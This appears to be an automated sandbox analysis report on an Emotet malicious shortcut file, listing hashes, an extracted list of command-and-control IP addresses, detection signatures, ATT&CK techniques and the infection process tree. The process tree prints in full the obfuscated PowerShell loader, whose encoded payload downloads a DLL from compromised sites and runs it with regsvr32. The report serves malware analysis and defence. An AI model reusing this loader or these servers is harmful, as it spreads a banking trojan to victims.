emotet | 3e3b827cf8b350d18fc92feb1c7bafd89ca2239eb903bef27bdc06a41de98b57

Target

UU3444499999999AA.lnk
Size

3KB
MD5

08205fbc8d439bb4dbded1b3b4146daa
SHA1

f07b89b0bb7691406f109e6be7d59551efa91fc7
SHA256

3e3b827cf8b350d18fc92feb1c7bafd89ca2239eb903bef27bdc06a41de98b57
SHA512

c1045c4ab9ce5e3fe0b2c13521b75e824b1501c626782aad55a20923d88ecdc9c0f28fd0b6f005dc5ea69b8af50bd7bb5963f389da55a4e7fc74fa8defbbc902

Score

10^/10

emotet banker suricata trojan

Malware Config

Extracted

Family

emotet

101.50.0.91:8080

159.89.202.34:443

209.97.163.214:443

173.212.193.249:8080

159.65.88.10:8080

45.118.115.99:8080

82.165.152.127:8080

207.148.79.14:8080

41.73.252.195:443

196.218.30.83:443

103.75.201.2:443

64.227.100.222:8080

149.56.131.28:8080

103.43.75.120:443

188.44.20.25:443

185.4.135.165:8080

91.207.28.33:8080

110.232.117.186:8080

72.15.201.15:8080

45.176.232.124:443

eck1.plain

ecs1.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata

Blocklisted process makes network request 4 IoCs

flow	pid	Process
6	2864	powershell.exe
14	2864	powershell.exe
16	2864	powershell.exe
18	2864	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	cmd.exe

Loads dropped DLL 2 IoCs

pid	Process
3080	regsvr32.exe
3108	regsvr32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2864	powershell.exe
2864	powershell.exe
3080	regsvr32.exe
3080	regsvr32.exe
3108	regsvr32.exe
3108	regsvr32.exe
3108	regsvr32.exe
3108	regsvr32.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2864	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4720 wrote to memory of 2864	4720	cmd.exe	80
PID 4720 wrote to memory of 2864	4720	cmd.exe	80
PID 2864 wrote to memory of 3080	2864	powershell.exe	82
PID 2864 wrote to memory of 3080	2864	powershell.exe	82
PID 3080 wrote to memory of 3108	3080	regsvr32.exe	87
PID 3080 wrote to memory of 3108	3080	regsvr32.exe	87

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\UU3444499999999AA.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "&{'/ZIIDxaZ4eOrVrXwvO7wSOLQe/f4UxLlrO9bmR5Uq4eReEdw+a2fZRMSDRMsW+yRtA38AWvk';$Hkc='JlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vbmljb2xhc3Nwb3J0YWZvbGlvLmF0d2VicGFnZXMuY29tL2Nzcy94S0FLYXpDVE4vIiwiaHR0cDovL3d3dy5haGFuLm9yZy5way9jYXRhbG9ndWVzL3YzLyIsImh0dHA6Ly9ucmMtc29sdWNpb25lcy5jb20uYXIvY2dpLWJpbi9uOWIwQTlOM0pScks2TXkvIiwiaHR0cDovL3d3dy5hZ3JldHRvLmNvbS9UZW1wbGF0ZS9qRURZQ1ltOG50SnQwU3EvIiwiaHR0cHM6Ly9teWFubWFyY2hlZnMuY29tL3dwLWNvbnRlbnQvS3VHNFc3aC8iLCJodHRwOi8vd29vbGxvb21vb2xvby5ubC9jZ2ktYmluL3pJZHdOQzJkLyIpOyR0PSJlblBNTXZSbiI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxLS0h3RUx3Y29YLnJLVTtSZWdzdnIzMi5leGUgIiRkXEtLSHdFTHdjb1gucktVIjticmVha30gY2F0Y2ggeyB9fQ==';$ZYCJ='IFdyaXRlLUhvc3QgInNBYlZTIjskUHJvZ3Jlc3NQcmVmZX';$ZYCJ=$ZYCJ+$Hkc;$EL=$ZYCJ;$gFtY=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($EL));$EL=$gFtY;iex($EL)}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2864
- - C:\Windows\system32\regsvr32.exe
    "C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\enPMMvRn\KKHwELwcoX.rKU
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3080
  - - C:\Windows\system32\regsvr32.exe
      C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MzNMy\zjHUgeeaO.dll"
      4⤵
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:3108

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\enPMMvRn\KKHwELwcoX.rKU

Filesize
303KB

MD5
892eec4c32c76249fb05d58972c33881

SHA1
2ff39d8f7d62a7928e13b44b86323b3a168a0d6a

SHA256
e8385e853408eb414c1744770b1f1584c7a34ffaaf08f857761b50f1ed806660

SHA512
3690708690a5a667362f2416396060dcc89b953dedfca43975afff99671f1828a9a9694e86f3f2803217e9a2a64a8dc1cf136bc1316769131bb31e9267b222cb

Download Submit
C:\Users\Admin\AppData\Local\enPMMvRn\KKHwELwcoX.rKU

Filesize
303KB

MD5
892eec4c32c76249fb05d58972c33881

SHA1
2ff39d8f7d62a7928e13b44b86323b3a168a0d6a

SHA256
e8385e853408eb414c1744770b1f1584c7a34ffaaf08f857761b50f1ed806660

SHA512
3690708690a5a667362f2416396060dcc89b953dedfca43975afff99671f1828a9a9694e86f3f2803217e9a2a64a8dc1cf136bc1316769131bb31e9267b222cb

Download Submit
C:\Windows\System32\MzNMy\zjHUgeeaO.dll

Filesize
303KB

MD5
892eec4c32c76249fb05d58972c33881

SHA1
2ff39d8f7d62a7928e13b44b86323b3a168a0d6a

SHA256
e8385e853408eb414c1744770b1f1584c7a34ffaaf08f857761b50f1ed806660

SHA512
3690708690a5a667362f2416396060dcc89b953dedfca43975afff99671f1828a9a9694e86f3f2803217e9a2a64a8dc1cf136bc1316769131bb31e9267b222cb

Download Submit
memory/2864-131-0x000002ACCF440000-0x000002ACCF462000-memory.dmp

Filesize
136KB

Download
memory/2864-132-0x00007FFADD9E0000-0x00007FFADE4A1000-memory.dmp

Filesize
10.8MB

Download
memory/2864-133-0x000002ACD0060000-0x000002ACD0806000-memory.dmp

Filesize
7.6MB

Download
memory/2864-139-0x00007FFADD9E0000-0x00007FFADE4A1000-memory.dmp

Filesize
10.8MB

Download
memory/3080-137-0x0000000180000000-0x000000018002B000-memory.dmp

Filesize
172KB

Download